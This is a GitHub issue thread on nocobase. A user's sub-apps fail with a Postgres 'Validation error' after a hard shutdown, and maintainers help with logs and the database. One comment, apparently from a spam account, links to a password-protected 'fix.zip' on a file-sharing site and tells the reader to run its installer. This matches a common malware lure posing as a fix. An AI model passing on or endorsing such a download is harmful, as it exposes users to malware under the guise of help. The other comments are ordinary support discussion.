### ISSUE TITLE
Validation Error !!!!!!

### ISSUE THREAD

**Issue by pehua** [nocobase/nocobase#5127]
## * Describe the bug

Cant start sub apps, I get "Validation Error" after a hadr sutdown.
Main app work ok but when I start subapps I get this error after 

I reinstall the app but the error stil there.

This is the message 
`2024-08-26 00:43:12 [error] Validation error                             stack=Error
    at Query.run (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\sequelize\lib\dialects\postgres\query.js:50:25)
    at D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\sequelize\lib\sequelize.js:315:28
    at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
    at async PostgresQueryInterface.addIndex (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\sequelize\lib\dialects\abstract\query-interface.js:250:12)
    at async _SyncRunner.handleUniqueIndex (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\database\lib\sync-runner.js:239:9)
    at async _SyncRunner.runSync (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\database\lib\sync-runner.js:94:5)
    at async users.sync (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\database\lib\model.js:57:12)
    at async Sequelize.sync (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\sequelize\lib\sequelize.js:377:9)
    at async _AsyncEmitter.sync (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\database\lib\database.js:592:20)
    at async _AsyncEmitter.load (D:\Servidor_NocoBase\NodeJSPortable\Data\nocobase-TMB\node_modules\@nocobase\server\lib\application.js:385:7) module=application app=mantenimientotmb reqId=c63dab9a-8650-4a2b-993b-d22ad3a8c8cb dataSourceKey=main`
## * Environment

- NocoBase version: 1.3

- Database type and version: postgres 16.2
  

- OS:windows

- Deployment Methods: create nocobase app

- Docker image version:

- NodeJS version: 20.11

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pehua** [comment]
Please help i've lost everything

**Comment by hongboji** [comment]
Can you start it again to trigger the error?
Send a package of the “storage\logs” folder in the installation directory so that we can troubleshoot the problem.

**Comment by pehua** [comment]
> Can you start it again to trigger the error? Send a package of the “storage\logs” folder in the installation directory so that we can troubleshoot the problem.

[mantenimientotmb.zip](https://github.com/user-attachments/files/16801249/mantenimientotmb.zip)

**Comment by hongboji** [comment]
The log mentions “[warn] attempt 9/9: Unable to connect to the database: database ‘mantenimientotmb’ does not exist”, what has been done to check if the database “mantenimientotmb” exists? “mantenimientotmb“ does not exist”, what has been done to check if the database “mantenimientotmb” exists?

**Comment by pehua** [comment]
Hi.

Yes, the database exists, luckily with a Postgres backup we were able to run the application again.

The error start after a hard shutdown of the nocobase app.

**Comment by chareice** [comment]
You can try again with the latest version, and if there are any issues, please reopen this issue or open a new one."
